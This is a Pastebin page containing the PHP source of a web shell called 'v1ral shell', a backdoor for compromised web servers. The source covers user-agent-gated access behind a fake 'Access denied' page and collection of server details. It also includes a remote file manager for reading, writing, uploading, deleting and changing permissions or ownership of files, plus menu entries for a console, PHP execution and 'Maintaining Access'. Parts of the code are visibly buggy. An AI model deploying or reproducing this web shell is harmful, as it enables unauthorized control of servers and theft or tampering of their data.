API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 6th, 2017
93
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.86 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. ob_start();
  4. ini_set('display_errors',0);
  5. $sh_user = 'v1raln0ize';
  6. $sh_pass = '';
  7. $sh_user_agent = 'v1raln0ize';
  8. $sh_allowed_addr = array("127.0.0.1");
  9. $sh_auth = 0;
  10. $r_host = gethostbyaddr($r_addr = $_SERVER['REMOTE_ADDR']);
  11. $l_addr = gethostbyname($l_host = $_SERVER['SERVER_NAME']);
  12. $disabled_functions = ini_get('disable_functions');
  13. $safe_mode = (ini_get('safe_mode') == '') ? 'Off' : 'On';
  14. $open_basedir = (ini_get('open_basedir') == '') ? 'Off' : 'On';
  15. $uname = php_uname();
  16. $software = $_SERVER['SERVER_SOFTWARE'];
  17. $phpver = phpversion();
  18. $script_loc = getcwd() . '/' . basename($_SERVER['PHP_SELF']);
  19. if(!isset($_SESSION['access'])) {
  20. switch($sh_auth) {
  21. case 3:
  22. if(!in_array($r_addr, $sh_allowed_addr)) sh_404($r_host.'@'.$l_host);
  23. case 2:
  24. if(!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER'] !== $sh_user || $_SERVER['PHP_AUTH_PW'] !== $sh_pass) {
  25. header("WWW-Authenticate: Basic Realm=\"Restricted area\"");
  26. header("HTTP/1.1 401 Unauthorized");
  27. sh_404($_SERVER['PHP_AUTH_USER'].'@'.$l_host);
  28. }
  29. case 1:
  30. if($_SERVER['HTTP_USER_AGENT'] !== $sh_user_agent) sh_404($_SERVER['HTTP_USER_AGENT'].'@'.$l_host);
  31. default:
  32. $_SESSION['access'] = true;
  33. }
  34. }
  35. if(isset($_POST['fup'])) {
  36. $uploadTo = $_POST['u_dir'];
  37. $fname = $_FILES['u_file']['name'];
  38. switch($_FILES['u_file']['error']) {
  39. case 0:
  40. if(@move_uploaded_file($_FILES['u_file']['tmp_name'], $dir . '/' . $fname)) echo "File uploaded successfully<br>";
  41. else echo "Failed to upload file!";
  42. break;
  43. }
  44. }
  45. class sh_files {
  46. var $file;
  47. var $dh;
  48. var $fh;
  49. var $ec;
  50. function dp_files($directory) {
  51. $dir = ($directory == null) ? fs_slashes(realpath(getcwd()), true) : fs_slashes(realpath($directory), true);
  52. if(!file_exists($dir)) {
  53. $this->ec = 4;
  54. $this->fs_error('DIR');
  55. } else {
  56. if(!is_resource($dh = opendir($dir))) {
  57. $this->ec = 2;
  58. $this->fs_error('DIR', $dir);
  59. } else {
  60. while(($this->file = readdir($dh))) {
  61. if($this->file == '.') continue;
  62. if($this->file == '..') {
  63. $arr = explode('/', $full_path);
  64. $new_path = '';
  65. for($i = 0; $i < count($arr) - 1; $i++) {
  66. $new_path .= $arr[$i].'/';
  67. }
  68. $full_path = fs_slashes($new_path);
  69. }
  70. $full_path = fs_slashes($dir . $this->file);
  71. $mtime = date('n:j:Y -- g:ia',filemtime($full_path));
  72. $owner = fs_owner($full_path);
  73. $group = fs_group($full_path);
  74. $perms = $this->fs_perms($full_path);
  75. if(is_file($full_path)) {
  76. $f_array['Name'][] = $full_path;
  77. $f_array['File'][] = $this->file;
  78. $f_array['Size'][] = $this->fs_size(filesize($full_path));
  79. $f_array['O'][] = $owner;
  80. $f_array['G'][] = $group;
  81. $f_array['Perms'][] = $perms;
  82. $f_array['Date'][] = $mtime;
  83. } else {
  84. $d_array['Name'][] = $full_path;
  85. $d_array['File'][] = $this->file;
  86. $d_array['Size'][] = $this->dir_size($full_path);
  87. $d_array['O'][] = $owner;
  88. $d_array['G'][] = $group;
  89. $d_array['Perms'][] = $perms;
  90. $d_array['Date'][] = $mtime;
  91. }
  92. }
  93. closedir($dh);
  94. return array($f_array, $d_array);
  95. }
  96. }
  97. return false;
  98. }
  99.  
  100. function fs_perms($fs_obj) {
  101. $perms = fileperms($fs_obj);
  102. if(($perms & 0xC000) == 0xC000) {$info = 's';
  103. } elseif (($perms & 0xA000) == 0xA000) {$info = 'l';
  104. } elseif (($perms & 0x8000) == 0x8000) {$info = '-';
  105. } elseif (($perms & 0x6000) == 0x6000) {$info = 'b';
  106. } elseif (($perms & 0x4000) == 0x4000) {$info = 'd';
  107. } elseif (($perms & 0x2000) == 0x2000) {$info = 'c';
  108. } elseif (($perms & 0x1000) == 0x1000) {$info = 'p';
  109. } else {$info = 'u';}
  110. $info .= (($perms & 0x0100) ? 'r' : '-');
  111. $info .= (($perms & 0x0080) ? 'w' : '-');
  112. $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's':'x') : (($perms & 0x0800) ?' S' : '-'));
  113. $info .= (($perms & 0x0020) ? 'r' : '-');
  114. $info .= (($perms & 0x0010) ? 'w' : '-');
  115. $info .= (($perms & 0x0008) ? (($perms & 0x0400)?'s':'x'):(($perms & 0x0400) ? 'S' : '-'));
  116. $info .= (($perms & 0x0004) ? 'r' : '-');
  117. $info .= (($perms & 0x0002) ? 'w' : '-');
  118. $info .= (($perms & 0x0001 ) ? (($perms & 0x0200)?'t' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
  119. return $info;
  120. }
  121.  
  122. function fs_size($fs_obj) {
  123. if(!$fs_obj) return 0;
  124. if($fs_obj >= 1073741824) return(round($fs_obj / 1073741824,2) . "GB");
  125. elseif($fs_obj >= 1048576) return(round($fs_obj / 1048576,2) . "MB");
  126. elseif($fs_obj >= 1024) return(round($fs_obj / 1024,2) . "KB");
  127. else return($fs_obj . "B");
  128. }
  129.  
  130. function dir_size($dir) {
  131. if(is_readable($dir)) {
  132. if(is_resource($dh2 = opendir($dir))) {
  133. while(($tmp = readdir($dh2))) {
  134. if(is_dir($dir.'/'.$tmp) || $tmp == '.' || $tmp == '..') continue;
  135. $full_path = fs_slashes($dir.'/'.$tmp);
  136. $size += filesize($full_path);
  137. closedir($dh2);
  138. }
  139. return $this->fs_size($size);
  140. }
  141. }
  142. return 'DIR';
  143. }
  144.  
  145. function fs_read($fs_obj) {
  146. if(!is_file($fs_obj)) {
  147. echo("Can't read directories<br>");
  148. return false;
  149. }
  150. if(!is_readable($fs_obj)) {
  151. $this->ec = 2;
  152. $this->fs_error('FILE', $fs_obj);
  153. return false;
  154. }
  155. if(!file_exists($fs_obj)) {
  156. $this->ec = 4;
  157. $this->fs_error('FILE', $fs_obj);
  158. } else {
  159. if(is_callable('file_get_contents')) {
  160. if(($contents = file_get_contents($fs_obj)) == FALSE) {
  161. $this->ec = 1;
  162. $this->fs_error('FILE', $fs_obj);
  163. return false;
  164. }
  165. return $contents;
  166. }
  167. if(is_callable('file')) {
  168. if(($arr = file($fs_obj)) == FALSE)
  169. {
  170. $this->ec = 1;
  171. $this->fs_error('FILE', $fs_obj);
  172. return false;
  173. }
  174. return explode("\n", $arr);
  175. }
  176. if(is_callable('fread')) {
  177. if(is_resource($this->fh = fopen($fs_obj, 'r'))) {
  178. while(!feof($this->fh)) {
  179. $contents .= fgets($this->fh);
  180. }
  181. fclose($this->fh);
  182. return $contents;
  183. } else {
  184. $this->ec = 1;
  185. $this->fs_error('FILE', $fs_obj);
  186. return false;
  187. }
  188. }
  189. echo "No available file-reading functions! Try WRITING a new php.ini file<br>";
  190. return false;
  191. }
  192. }
  193.  
  194. function fs_write($fs_obj, $data) {
  195. if(!is_file($fs_obj)) {
  196. echo("Can't write into a directory<br>");
  197. return false;
  198. }
  199. if(!is_writable($fs_obj)) {
  200. $this->ec = 3;
  201. $this->fs_error('FILE', $fs_obj);
  202. return false;
  203. }
  204. if(is_callable('fwrite')) {
  205. if(($this->fh = fopen($fs_obj, 'w')) == FALSE) {
  206. $this->ec = 1;
  207. $this->fs_error('FILE', $fs_obj);
  208. return false;
  209. } else {
  210. fwrite($this->fh, $data);
  211. fclose($fs_obj);
  212. }
  213. } else {
  214. echo("No available file-writing functions!<br>");
  215. return false;
  216. }
  217. }
  218.  
  219. function file_delete($fs_obj, $disp = true) {
  220. if(!file_exists($fs_obj)) {
  221. echo("File does not exist, can't delete!<br>");
  222. return false;
  223. }
  224. if($disp) {
  225. if(unlink($fs_obj)) echo "Deleted file $fs_obj successfully!<br>";
  226. else echo("Failed to delete file $fs_obj<br>");
  227. } else {
  228. if(unlink($fs_obj))
  229. return true;
  230. return false;
  231. }
  232. }
  233.  
  234. function dir_delete($fs_objm, $disp = true) {
  235. $success = $count = 0;
  236. if(!is_dir($fs_obj)) {
  237. echo("Object is not a directory, not deleting.<br>");
  238. return false;
  239. }
  240. if(is_resource($this->dh = opendir($fs_obj))) {
  241. while(($this->file = readdir($this->dh))) {
  242. if($this->file == '.' || $this->file == '..') continue;
  243. $full_path = fs_slashes($fs_obj . $this->file);
  244. if(is_dir($full_path)) {
  245. dir_delete($full_path, false);
  246. } else {
  247. if(file_delete($fs_obj, $disp)) $success++;
  248. }
  249. $count++;
  250. }
  251. echo "Managed to delete $success of $count files<br>";
  252. } else {
  253. $this->ec = 2;
  254. $this->fs_error('DIR', $fs_obj);
  255. return false;
  256. }
  257. }
  258.  
  259. function file_chown($fs_obj, $own) {
  260. if(chown($fs_obj, $own)) echo "Successfully chown file $fs_obj $mod<br>";
  261. else echo "Failed to chown file $fs_obj<br>";
  262. }
  263.  
  264. function file_chgrp($fs_obj, $grp) {
  265. if(chgrp($fs_obj, $grp)) echo "Successfully chgrp file $fs_obj $mod<br>";
  266. else echo "Failed to chgrp file $fs_obj<br>";
  267. }
  268.  
  269. function file_chmod($fs_obj, $mod) {
  270. if(chmod($fs_obj, $mod)) echo "Successfully chmod file $fs_obj $mod<br>";
  271. else echo "Failed to chmod file $fs_obj<br>";
  272. }
  273.  
  274. function fs_error($fs_type, $fs_obj) {
  275. switch($this->ec) {
  276. case 1:
  277. echo "Error -- failed to open " . $fs_type . " $fs_obj (unknown file I/O error)<br>";
  278. break;
  279. case 2:
  280. echo "Error -- failed to open " . $fs_type . " $fs_obj (not readable)<br>";
  281. break;
  282. case 3:
  283. echo "Error -- failed to open " . $fs_type . " $fs_obj (not writable)<br>";
  284. break;
  285. case 4:
  286. echo "Error -- failed to open " . $fs_type . " $fs_obj (doesn't exist)<br>";
  287. }
  288. }
  289. }
  290.  
  291. class sh_mysql {
  292. function dbconnect() {
  293. }
  294. }
  295.  
  296. function fs_owner($fs_obj) {
  297. $owner = (is_callable('posix_getpwuid')) ? posix_getpwuid(fileowner($fs_obj)) : fileowner($fs_obj);
  298. if(is_array($owner)) $owner = $owner['name'];
  299. return $owner;
  300. }
  301.  
  302. function fs_group($fs_obj) {
  303. $group = (is_callable('posix_getgrgid')) ? posix_getgrgid(filegroup($fs_obj)) : filegroup($fs_obj);
  304. if(is_array($group)) $group = $group['name'];
  305. return $group;
  306. }
  307.  
  308. function fs_slashes($fs_obj, $end = false) {
  309. str_replace(str_replace("\\\\","//",$fs_obj),"//","/");
  310. if($end) if(strpos($fs_obj, '/', -1) === FALSE) $fs_obj .= '/';
  311. return $fs_obj;
  312. }
  313.  
  314. function dp_files($dir = null) {
  315. global $fs;
  316. echo "<table id='fs' border=1>
  317. <tr><th>File</th><th>Size</th><th>Permissions</th><th>Owner/Group</th><th>Date</th></tr>";
  318. list($files,$dirs) = $fs->dp_files($dir);
  319. for($i = 0; $i < count($dirs['Name']); $i++)
  320. echo "<tr><td><a href='#' onclick=\"x('f&d=".$dirs['Name'][$i]."')\">".$dirs['File'][$i]."</a></td>
  321. <td>".$dirs['Size'][$i]."</td><td><a href='#' onclick=\"x('chmod&f=".$dirs['Name'][$i]."')\">".$dirs['Perms'][$i]."</a></td>
  322. <td><a href='#' onclick=\"x('chown&f=".$dirs['Name'][$i]."')\">".$dirs['O'][$i]."</a>/<a href='#' onclick=\"x('chgrp&f=".$dirs['Name'][$i]."')\">".$dirs['G'][$i]."</a></td>
  323. <td>".$dirs['Date'][$i]."</td></tr>";
  324. for($i = 0; $i < count($files['Name']); $i++)
  325. echo "<tr><td><a href='#' onclick=\"x('read&f=".$files['Name'][$i]."')\">".$files['File'][$i]."</a></td>
  326. <td>".$files['Size'][$i]."</td><td><a href='#' onclick=\"x('chmod&f=".$files['Name'][$i]."')\">".$files['Perms'][$i]."</a></td>
  327. <td><a href='#' onclick=\"x('chown&f=".$files['Name'][$i]."')\">".$files['O'][$i]."</a>/<a href='#' onclick=\"x('chgrp&f=".$files['Name'][$i]."')\">".$files['G'][$i]."</a></td>
  328. <td>".$files['Date'][$i]."</td></tr>";
  329. echo "</table><br>
  330. <table style='width: 100%; text-align: center;'><tr><td>Create File</td><td>Create Directory</td></tr>
  331. <tr><td>File: <input type='text' value='$dir'> <input type='button' value='Create'></td>
  332. <td>Directory: <input type='text' value='$dir'> <input type='button' value='Create'></td></tr>
  333. <tr><td><form action='' method=post' enctype='multipart/form-data'>
  334. Upload directory: <input type='text' value='' name='u_dir'><br>File: <input type='file' name='u_file'><input type='submit' value='Upload' name='fup'>
  335. </form></td><td>Upload file (From URL): <input type='text' value=''><br>Upload directory: <input type='text' value=''> <input type='button' value='Upload'></td></tr></table>";
  336. }
  337.  
  338. function dp_file($file, $data) {
  339. echo "<input type='button' value='Write'> <textarea rows='20' style='width: 100%'>".htmlspecialchars($data)."</textarea><br>";
  340. }
  341.  
  342. function touch_file($f) {
  343. global $fs;
  344. if(!file_exists($f)) {
  345. $fs->fs_write($f, '');
  346. } else {
  347. echo "File $f already exists (did not write file)<br>";
  348. }
  349. }
  350.  
  351. function chmod_file($fs_obj, $mode_current) {
  352. echo "Changing permissions for $fs_obj: <input type='text' style='width: 50px' value='$mode_current'> <input type='button' value='Change Perms'>";
  353. }
  354.  
  355. function chown_file($fs_obj, $own_current) {
  356. echo "Changing owner for $fs_obj: <input type='text' style='width: 130px' value='$own_current'> <input type='button' value='Change Owner'>";
  357. }
  358.  
  359. function chgrp_file($fs_obj, $grp_current) {
  360. echo "Changing group for $fs_obj: <input type='text' style='width: 130px' value='$grp_current'> <input type='button' value='Change Group'>";
  361. }
  362.  
  363. function sh_404($var) {
  364. die("<html><head><title>Denied access to $var</title><style>body{background: #000000; color: #00FF00; text-align: center; font-size: 42px;}</style></head><body>
  365. <br><br><br><br><br><b>Access denied to<br> <font color='#ff0000'><blink>$var</blink></font></b></body></html>");
  366. }
  367. $fs = new sh_files;
  368. if(isset($_POST['act'])) {
  369. switch($_POST['act']) {
  370. case 'f':
  371. dp_files($_POST['d']);
  372. break;
  373. case 'read':
  374. $contents = $fs->fs_read($_POST['f']);
  375. dp_file($_POST['f'], $contents);
  376. break;
  377. case 'write':
  378. $data = stripslashes($_POST['d']);
  379. $fs->fs_write($_POST['f'], $data);
  380. break;
  381. case 'tch':
  382. touch_file($_POST['f']);
  383. break;
  384. case 'mkdir':
  385. if(file_exists($_POST['d'])) {
  386. echo "Directory $_POST[d] already exists<br>";
  387. } else {
  388. if(mkdir($_POST['d'])) echo "Directory $_POST[d] created<br>";
  389. else echo "Failed to create directory $_POST[d]<br>";
  390. }
  391. break;
  392. case 'chmod':
  393. if(!isset($_POST['v']))
  394. chmod_file($_POST['f'], fileperms($_POST['f']));
  395. else
  396. die("Chmodding ".$_POST['v']."\n");
  397. break;
  398. case 'chown':
  399. if(!isset($_POST['v']))
  400. chown_file($_POST['f'], fs_owner($_POST['f']));
  401. else
  402. die("Chowning ".$_POST['v']."\n");
  403. break;
  404. case 'chgrp':
  405. if(!isset($_POST['v']))
  406. chgrp_file($_POST['f'], fs_group($_POST['f']));
  407. else
  408. die("Chgrping ".$_POST['v']."\n");
  409. break;
  410. default:
  411. dp_files();
  412. }
  413. exit;
  414. }
  415. ?>
  416. <html>
  417. <head>
  418. <title>v1ral shell</title>
  419. <style>
  420. body{font-family:trebuchet ms,arial;background:#000000;color:#FFFFFF;font-size:12px;}
  421. a{text-decoration:none;font-family:sans-serif;color:#FFFFFF;}
  422. textarea{color:#FFFFFF;background:#01001B;border:1px solid #090909;}
  423. td{font-family:arial;}
  424. th{color:#FF8000;}
  425. table{font-size:13px;border-color:#505050}
  426. #fs{width: 100%;border-collapse:collapse;border-color:#131F5B;}
  427. #fs tr:hover{background:#4286FC;}
  428. #s_nav{border-bottom:2px solid #585DAD; padding-bottom:0px;text-align:center;position:absolute;width:100%;left:0;}
  429. #s_nav a{color:#FFFFFF;font-size:14px;padding: 0px 18px 0px 18px;background:#05112D;border: 1px solid #585DAD;}
  430. #s_nav a:hover{background:#3D8DE5;font-weight:bold;}
  431. </style>
  432. <script>
  433.  
  434. function x(d) {
  435. var xmlHttp;
  436. var postData = 'act=';
  437. postData += d;
  438. //alert(postData);
  439. if(window.XMLHttpRequest) xmlHttp = new XMLHttpRequest();
  440. else xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
  441. xmlHttp.open('POST', '?', true);
  442. xmlHttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
  443. xmlHttp.send(postData);
  444. xmlHttp.onreadystatechange = function()
  445. {
  446. if(xmlHttp.readyState == 4)
  447. //alert(xmlHttp.responseText);
  448. document.getElementById('s_sh').innerHTML = xmlHttp.responseText;
  449. }
  450. }
  451. </script>
  452. </head>
  453. <body><div id='s_nav'><a href='#' onclick="x('f')">Files</a> <a href='#'>Console</a> <a href='#'>MySQL</a> <a href='#'>PHP-Exec</a> <a href='#'>Domains</a> <a href='#'>Server Overview</a> <a href='#'>Maintaining Access</a></div><br><br><br>
  454. <div id='s_sh'>
  455. <script>x('f');</script>
  456. <?php
  457. ob_end_flush();
  458. ?>
  459. </div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!